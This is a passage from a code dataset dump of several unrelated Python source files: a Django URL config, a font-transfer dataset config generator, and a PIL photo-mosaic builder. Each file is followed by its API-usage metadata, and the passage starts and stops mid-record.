"usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 137, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 138, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 139, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 140, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 141, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 142, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 143, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 144, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 145, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 146, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 147, "usage_type": "call"}, {"api_name": "pybassmidi.BASS_MIDI_FontInit", "line_number": 150, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 153, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 153, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginLoad", "line_number": 155, "usage_type": "call"}, {"api_name": "wx.Panel.__init__", "line_number": 159, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 159, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 163, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 163, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 165, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 168, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 168, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 169, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 172, "usage_type": "call"}, {"api_name": "wx.ID_OPEN", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.NO_BORDER", "line_number": 172, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 176, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 176, "usage_type": "attribute"}, {"api_name": "wx.lib.ticker.Ticker", "line_number": 178, "usage_type": "call"}, {"api_name": "wx.EXPAND", "line_number": 180, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 183, "usage_type": "attribute"}, {"api_name": "wx.Slider", "line_number": 190, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 190, "usage_type": "attribute"}, {"api_name": "pybass.BASS_GetVolume", "line_number": 190, "usage_type": "call"}, {"api_name": "wx.EVT_SCROLL", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 192, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 204, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 204, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 205, "usage_type": "attribute"}, {"api_name": "wx.FD_CHANGE_DIR", "line_number": 205, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "pybass.BASS_UNICODE", "line_number": 211, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.remove", "line_number": 213, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 213, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.append", "line_number": 217, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 217, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MUSIC_PRESCAN", "line_number": 221, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MusicLoad", "line_number": 222, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreateFile", "line_number": 225, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 227, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 227, "usage_type": "call"}, {"api_name": "wx.FileDialog", "line_number": 238, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 238, "usage_type": "call"}, {"api_name": "wx.OPEN", "line_number": 239, "usage_type": "attribute"}, {"api_name": "wx.CHANGE_DIR", "line_number": 239, "usage_type": "attribute"}, {"api_name": "wx.ID_OK", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pybass.BASS_UNICODE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.remove", "line_number": 247, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 247, "usage_type": "attribute"}, {"api_name": "pybass.BASS_CHANNELINFO._fields_.append", "line_number": 251, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pybass.ctypes", "line_number": 251, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.cast", "line_number": 254, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 254, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memset", "line_number": 255, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 255, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.c_char_p", "line_number": 256, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 256, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memmove", "line_number": 257, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pybass.BASS_STREAMPROC_END", "line_number": 259, "usage_type": "attribute"}, {"api_name": "pybass.STREAMPROC", "line_number": 263, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreate", "line_number": 265, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 267, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 267, "usage_type": "call"}, {"api_name": "pybass.STREAMFILE_BUFFER", "line_number": 282, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.cast", "line_number": 294, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memset", "line_number": 295, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 295, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.c_char_p", "line_number": 296, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 296, "usage_type": "attribute"}, {"api_name": "pybass.ctypes.memmove", "line_number": 297, "usage_type": "call"}, {"api_name": "pybass.ctypes", "line_number": 297, "usage_type": "attribute"}, {"api_name": "pybass.BASS_FILEPROCS", "line_number": 305, "usage_type": "call"}, {"api_name": "pybass.FILECLOSEPROC", "line_number": 306, "usage_type": "call"}, {"api_name": "pybass.FILELENPROC", "line_number": 307, "usage_type": "call"}, {"api_name": "pybass.FILEREADPROC", "line_number": 308, "usage_type": "call"}, {"api_name": "pybass.FILESEEKPROC", "line_number": 309, "usage_type": "call"}, {"api_name": "pybass.BASS_StreamCreateFileUser", "line_number": 310, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 314, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 314, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_STREAM_OGG", "line_number": 319, "usage_type": "attribute"}, {"api_name": "pyogginfo.VorbisStreamInfo", "line_number": 321, "usage_type": "call"}, {"api_name": "pyogginfo.SimpleDemultiplexer", "line_number": 322, "usage_type": "call"}, {"api_name": "pybass.BASS_CHANNELINFO", "line_number": 340, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelGetInfo", "line_number": 341, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 342, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 342, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelIsActive", "line_number": 346, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelGetLength", "line_number": 349, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 349, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelGetPosition", "line_number": 355, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 355, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelSetPosition", "line_number": 358, "usage_type": "call"}, {"api_name": "pybass.BASS_POS_BYTE", "line_number": 358, "usage_type": "attribute"}, {"api_name": "pybass.get_error_description", "line_number": 359, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 359, "usage_type": "call"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 368, "usage_type": "attribute"}, {"api_name": "pybass.seconds_to_string", "line_number": 374, "usage_type": "call"}, {"api_name": "pybass.stream_length_as_hms", "line_number": 378, "usage_type": "call"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 391, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ACTIVE_STOPPED", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ACTIVE_PAUSED", "line_number": 395, "usage_type": "attribute"}, {"api_name": "pybass.BASS_ChannelPlay", "line_number": 396, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 397, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 397, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelPause", "line_number": 403, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 404, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 404, "usage_type": "call"}, {"api_name": "pybass.BASS_SetVolume", "line_number": 410, "usage_type": "call"}, {"api_name": "pybass.BASS_ChannelStop", "line_number": 430, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 431, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 431, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_MUSIC_MOD", "line_number": 438, "usage_type": "attribute"}, {"api_name": "pybass.BASS_MusicFree", "line_number": 439, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 440, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 440, "usage_type": "call"}, {"api_name": "pybass.BASS_CTYPE_STREAM", "line_number": 443, "usage_type": "attribute"}, {"api_name": "pybass.BASS_StreamFree", "line_number": 444, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 445, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 445, "usage_type": "call"}, {"api_name": "pybassmidi.BASS_MIDI_FontFree", "line_number": 457, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 458, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 458, "usage_type": "call"}, {"api_name": "pybass.BASS_PluginFree", "line_number": 461, "usage_type": "call"}, {"api_name": "pybass.get_error_description", "line_number": 462, "usage_type": "call"}, {"api_name": "pybass.BASS_ErrorGetCode", "line_number": 462, "usage_type": "call"}, {"api_name": "locale.setlocale", "line_number": 475, "usage_type": "call"}, {"api_name": "locale.LC_ALL", "line_number": 475, "usage_type": "argument"}, {"api_name": "wx.TextCtrl", "line_number": 477, "usage_type": "attribute"}, {"api_name": "wx.Frame", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 513, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 513, "usage_type": "attribute"}, {"api_name": "wx.TE_MULTILINE", "line_number": 515, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 516, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.LogTextCtrl", "line_number": 518, "usage_type": "call"}, {"api_name": "wx.LOG_Error", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.lib.agw.aui.AuiManager", "line_number": 528, "usage_type": "call"}, {"api_name": "wx.lib.agw.aui.AuiPaneInfo", "line_number": 530, "usage_type": "call"}, {"api_name": "wx.lib.agw.aui.AuiPaneInfo", "line_number": 531, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 553, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 555, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 556, "usage_type": "call"}, {"api_name": "os.path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 556, "usage_type": "attribute"}, {"api_name": "locale.getdefaultlocale", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 569, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 570, "usage_type": "call"}, {"api_name": "os.path", "line_number": 570, "usage_type": "attribute"}, {"api_name": "gettext.GNUTranslations", "line_number": 574, "usage_type": "call"}, {"api_name": "gettext.NullTranslations", "line_number": 583, "usage_type": "call"}, {"api_name": "wx.Locale", "line_number": 587, "usage_type": "call"}, {"api_name": "wx.LANGUAGE_DEFAULT", "line_number": 587, "usage_type": "attribute"}, {"api_name": "wx.GetUserId", "line_number": 589, "usage_type": "call"}, {"api_name": "wx.SingleInstanceChecker", "line_number": 591, "usage_type": "call"}, {"api_name": "wx.MessageBox", "line_number": 593, "usage_type": "call"}, {"api_name": "wx.html.HtmlHelpController", "line_number": 597, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 598, "usage_type": "call"}, {"api_name": "os.path", "line_number": 598, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 608, "usage_type": "attribute"}]} +{"seq_id": "136093426", "text": "from django.urls import path\nfrom basic_app import views\n\napp_name = 'basic_app'\n\nurlpatterns = [\n path('student/', views.student, name='student'),\n path('teacher/', views.teacher, name='teacher'),\n path('form_page/', views.form_name_view, name='form')\n]", "sub_path": "school/basic_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 263, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "basic_app.views.student", "line_number": 7, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "basic_app.views.teacher", "line_number": 8, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "basic_app.views.form_name_view", "line_number": 9, "usage_type": "attribute"}, {"api_name": "basic_app.views", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "505703618", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#########################################################\n# Create on 2018-07-10\n#\n# Author: jiean001\n#\n# 生成数据集的配置文件\n# style_content_gt:\n# -- list\n# -- style_list\n# -- content_list\n# -- gt_list\n# -- list\n# ...\n#########################################################\n\nfrom utils.dir_util import *\nimport json\nimport numpy as np\n\n#  style和content的关系表\n# 这个表应该是随机生成的,当前先固定下来\nstyle_content_related_map = {'style_name': '[content_name1, content_name2, ..., content_nameN]'}\n# standard_file = '000004'\nstandard_file = '001234'\ncontent_file_lists = [standard_file, standard_file, standard_file]\n# content_file_lists = ['000004', '000004', '000004']\n\n\n# 随机生成一个字符\ndef generate_one_char(file_name=None):\n if file_name:\n return '%s/%s.png' % (file_name, chr(np.random.randint(0, 26) + ord('A')))\n return '%s.png' % (chr(np.random.randint(0, 26) + ord('A')))\n\n\n# 随机生成一组style_num个style字符\ndef generate_style_pair(style_num=3, file_name=None):\n style_pair = [generate_one_char(file_name)]\n for i in range(1, style_num):\n new_char = generate_one_char(file_name)\n while new_char in style_pair:\n new_char = generate_one_char(file_name)\n style_pair.append(new_char)\n return style_pair\n\n\n# 随机生成ground truth\ndef generate_gt(file_name=None):\n return [generate_one_char(file_name)]\n\n\n# 随机生成content数据\ndef generate_content_pair(gt_name):\n gt_name = gt_name[0]\n style_file_name, gt = os.path.split(gt_name)\n content_pair = []\n # 在下一个version进行更改\n # for content_file_name in style_content_related_map[style_file_name]:\n for content_file_name in content_file_lists:\n atom = gt_name.replace(style_file_name, content_file_name)\n content_pair.append(atom)\n return content_pair\n\n\n# 生成一行数据\ndef generate_one_row(style_num=3, file_name=None):\n one_row = []\n style_pair = generate_style_pair(style_num=style_num, file_name=file_name)\n gt = generate_gt(file_name=file_name)\n content_pair = generate_content_pair(gt)\n one_row.append(style_pair)\n one_row.append(content_pair)\n one_row.append(gt)\n if standard_file:\n standard_style_letter = []\n for style_letter in style_pair:\n standard_style_letter.append(style_letter.replace(style_letter.split('/')[0], standard_file))\n # print(style_pair, standard_style_letter)\n one_row.append(standard_style_letter)\n return one_row\n\n\nclass Data_Config_Generate:\n def __init__(self, each_style_num=4, each_config_num=1024, style_num=3,\n dataset_name=r'Capitals_colorGrad64',\n dataset_dir=r'/home/xiongbo/datasets/SEPARATE/Capitals_colorGrad64/train/',\n config_dir=r'../config/train/',\n iterate_dir=iterate_dir, generate_one_row=generate_one_row):\n # 每个配置文件有 each_style_num * each_config_num条数据\n # 每个style有几个字符 Capitals_colorGrad64\n self.each_style_num = each_style_num\n # 每个config文件有多少组风格\n self.each_config_num = each_config_num\n # 数据集合的路径\n self.dataset_dir = dataset_dir\n self.dataset_name = dataset_name\n # 配置文件的存放地\n self.config_dir = config_dir\n # 当前配置文件存放了多少条数据\n self.crt_config_num = 0\n # 当前配置文件的索引\n self.crt_config_file_index = 0\n # 每行数据有几个style字符\n self.style_num = style_num\n\n self.generate_one_row = generate_one_row\n\n self.create_new_cofig_file()\n # 遍历文件夹\n self.iterate_dir = iterate_dir\n self.iterate_dir(self.dataset_dir, deal_dir=self.deal_dir, deal_file=self.deal_file)\n self.save_to_json()\n\n def create_new_cofig_file(self):\n self.config_file = os.path.join(self.config_dir, '%s_%04d.json' %(self.dataset_name, self.crt_config_file_index))\n self.crt_config_file_index += 1\n self.crt_config_num = 0\n self.style_content_gt_list = []\n\n #  生成每个font的训练数据\n def deal_one_font(self, style_num=4, file_name=None):\n _style_content_gt_list = [self.generate_one_row(style_num=style_num, file_name=file_name)]\n if self.each_style_num >= 26:\n s_c_g_st = _style_content_gt_list[0]\n _style_content_gt_list = []\n s, c, g, st = s_c_g_st[0], s_c_g_st[1], s_c_g_st[2], s_c_g_st[3]\n content = g[0][-5]\n for i in range(26):\n crt_c = []\n for _c in c:\n crt_c.append(_c.replace(content, chr(ord('A') + i)))\n crt_s_c_g_st = [s, crt_c, [g[0].replace(content, chr(ord('A') + i))], st]\n _style_content_gt_list.append(crt_s_c_g_st)\n if each_style_num > 26:\n for j in range(each_style_num - 26):\n i = 25\n crt_c = []\n for _c in c:\n crt_c.append(_c.replace(content, chr(ord('A') + i)))\n crt_s_c_g_st = [s, crt_c, [g[0].replace(content, chr(ord('A') + i))], st]\n _style_content_gt_list.append(crt_s_c_g_st)\n '''\n for i in range(each_style_num-26):\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n while s_c_g in _style_content_gt_list:\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n _style_content_gt_list.append(s_c_g)\n '''\n else:\n for i in range(1, self.each_style_num):\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n while s_c_g in _style_content_gt_list:\n s_c_g = self.generate_one_row(style_num=style_num, file_name=file_name)\n _style_content_gt_list.append(s_c_g)\n return _style_content_gt_list\n\n # 保存为json文件\n def save_to_json(self):\n with open(self.config_file, 'w') as f:\n json.dump(self.style_content_gt_list, f)\n print('save %s okay' % (self.config_file))\n self.create_new_cofig_file()\n\n def deal_dir(self, path):\n _, style_name = os.path.split(path)\n self.crt_config_num += 1\n self.style_content_gt_list += self.deal_one_font(style_num=self.style_num, file_name=style_name)\n # self.style_content_gt_list.append(self.deal_one_font(style_num=self.style_num, file_name=style_name))\n if self.crt_config_num == self.each_config_num:\n self.save_to_json()\n\n def deal_file(self, image_path):\n return 'pass'\n\n\nif __name__ == '__main__':\n # pc\n each_style_num = 30\n each_config_num = 500 # 1024\n style_num = 8\n dataset_name = r'Capitals_colorGrad64'\n # pc\n # dataset_dir = r'/home/xiongbo/datasets/SEPARATE/Capitals_colorGrad64/test/'\n # 93 218\n dataset_dir = r'/home/share/dataset/MCGAN/SEPARATE/Capitals_colorGrad64/train/'\n\n config_dir = r'../config/train/'\n iterate_dir = iterate_dir\n tmp = Data_Config_Generate(each_style_num=each_style_num, each_config_num=each_config_num,\n style_num=style_num, dataset_dir=dataset_dir,\n config_dir=config_dir)\n # 93\n # dataset_dir = r'/home/share/dataset/MCGAN/SEPARATE/Capitals_colorGrad64/train/'\n # tmp_93 = Data_Config_Generate(dataset_dir=dataset_dir, style_num=\n", "sub_path": "academic/reweighted_font_transfer/dataset/data_config_generate.py", "file_name": "data_config_generate.py", "file_ext": "py", "file_size_in_byte": 7700, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "384050339", "text": "import sys\nimport os\n\nfrom PIL import Image\n\n# Change these 3 config parameters to suit your needs...\nTILE_SIZE = 50 # height/width of mosaic tiles in pixels\nTILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)\nENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the original\n\nTILE_BLOCK_SIZE = int(TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1))\nOUT_FILE = 'mosaic.jpg'\n\n\ndef get_tile(fn):\n try:\n img = Image.open(fn)\n # tiles must be square, so get the largest square that fits inside the image\n w, h = img.size\n min_dimension = min(w, h)\n w_crop = (w - min_dimension) / 2\n h_crop = (h - min_dimension) / 2\n img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))\n\n large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), Image.ANTIALIAS)\n small_tile_img = img.resize((int(TILE_SIZE / TILE_BLOCK_SIZE), int(TILE_SIZE / TILE_BLOCK_SIZE)), Image.ANTIALIAS)\n\n return large_tile_img.convert('RGB'), small_tile_img.convert('RGB')\n except:\n return None, None\n\n\ndef get_tiles(tiles_directory):\n large_tiles = []\n small_tiles = []\n\n # search the tiles directory recursively\n for root, _, files in os.walk(tiles_directory):\n for fn in files:\n tile_path = os.path.join(root, fn)\n large_tile, small_tile = get_tile(tile_path)\n if large_tile:\n large_tiles.append(large_tile)\n small_tiles.append(small_tile)\n\n return large_tiles, small_tiles\n\n\ndef get_target_image_data(fn):\n img = Image.open(fn)\n w = img.size[0] * ENLARGEMENT\n h = img.size[1] * ENLARGEMENT\n large_img = img.resize((w, h), Image.ANTIALIAS)\n w_diff = (w % TILE_SIZE)/2\n h_diff = (h % TILE_SIZE)/2\n\n # if necesary, crop the image slightly so we use a whole number of tiles horizontally and vertically\n print(w_diff, h_diff)\n if w_diff or h_diff:\n large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))\n\n small_img = large_img.resize((int(w / TILE_BLOCK_SIZE), int(h / TILE_BLOCK_SIZE)), Image.ANTIALIAS)\n\n image_data = large_img.convert('RGB'), small_img.convert('RGB')\n return image_data\n\n\nclass TileFitter:\n def __init__(self, tiles_data):\n self.tiles_data = tiles_data\n\n def __get_tile_diff(self, t1, t2, bail_out_value):\n diff = 0\n for i in range(len(t1)):\n diff += ((t1[i][0] - t2[i][0])**2 + (t1[i][1] - t2[i][1])**2 + (t1[i][2] - t2[i][2])**2)\n if diff > bail_out_value:\n # we know already that this isnt going to be the best fit, so no point continuing with this tile\n return diff\n return diff\n\n def get_best_fit_tile(self, img_data):\n best_fit_tile_index = None\n min_diff = sys.maxsize\n tile_index = 0\n\n # go through each tile in turn looking for the best match for the part of the image represented by 'img_data'\n for tile_data in self.tiles_data:\n diff = self.__get_tile_diff(img_data, tile_data, min_diff)\n if diff < min_diff:\n min_diff = diff\n best_fit_tile_index = tile_index\n tile_index += 1\n\n return best_fit_tile_index\n\n\nclass MosaicImage:\n def __init__(self, original_img):\n self.image = Image.new(original_img.mode, original_img.size)\n self.x_tile_count = original_img.size[0] // TILE_SIZE\n self.y_tile_count = original_img.size[1] // TILE_SIZE\n\n def add_tile(self, tile_data, coords):\n img = Image.new('RGB', (TILE_SIZE, TILE_SIZE))\n img.putdata(tile_data)\n self.image.paste(img, coords)\n\n def save(self, path):\n self.image.save(path)\n\n\ndef build_mosaic(result_queue, all_tile_data_large, original_img_large):\n mosaic = MosaicImage(original_img_large)\n\n for img_coords, best_fit_tile_index in result_queue:\n tile_data = all_tile_data_large[best_fit_tile_index]\n mosaic.add_tile(tile_data, img_coords)\n\n mosaic.save(OUT_FILE)\n\n\ndef compose(original_img, tiles):\n original_img_large, original_img_small = original_img\n tiles_large, tiles_small = tiles\n\n mosaic = MosaicImage(original_img_large)\n\n all_tile_data_large = list(map(lambda tile: list(tile.getdata()), tiles_large))\n all_tile_data_small = list(map(lambda tile: list(tile.getdata()), tiles_small))\n\n # start the worker processes that will perform the tile fitting\n result_queue = []\n # this function gets run by the worker processes, one on each CPU core\n tile_fitter = TileFitter(all_tile_data_small)\n for x in range(mosaic.x_tile_count):\n for y in range(mosaic.y_tile_count):\n large_box = x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE\n small_box = x * TILE_SIZE/TILE_BLOCK_SIZE, y * TILE_SIZE/TILE_BLOCK_SIZE, (x + 1) * TILE_SIZE/TILE_BLOCK_SIZE, (y + 1) * TILE_SIZE/TILE_BLOCK_SIZE\n img_data, img_coords = list(original_img_small.crop(small_box).getdata()), large_box\n tile_index = tile_fitter.get_best_fit_tile(img_data)\n result_queue.append((img_coords, tile_index))\n\n # start the worker processes that will build the mosaic image\n build_mosaic(result_queue, all_tile_data_large, original_img_large)\n\n\ndef mosaic(img_path, tiles_path):\n tiles_data = get_tiles(tiles_path)\n image_data = get_target_image_data(img_path)\n compose(image_data, tiles_data)\n\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print(f'Usage: {sys.argv[0]} \\r')\n else:\n mosaic(sys.argv[1], sys.argv[2])\n", "sub_path": "mosaic.py", "file_name": "mosaic.py", "file_ext": "py", "file_size_in_byte": 5699, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 50, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 62, "usage_type": "name"}, {"api_name": "sys.maxsize", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PIL.Image.new", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 104, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 104, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 154, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 157, "usage_type": "attribute"}]} +{"seq_id": "550726727", "text": "#!/usr/bin/python3\n\nimport bson\n\ndef format_query(query_usr):\n\tquery_list = []\n\tfor key, value in query_usr.items():\n\t\tif key == \"hostname\":\n\t\t\tqtag = \"\"\n\t\telse:\n\t\t\tqtag = \"%s:\" % 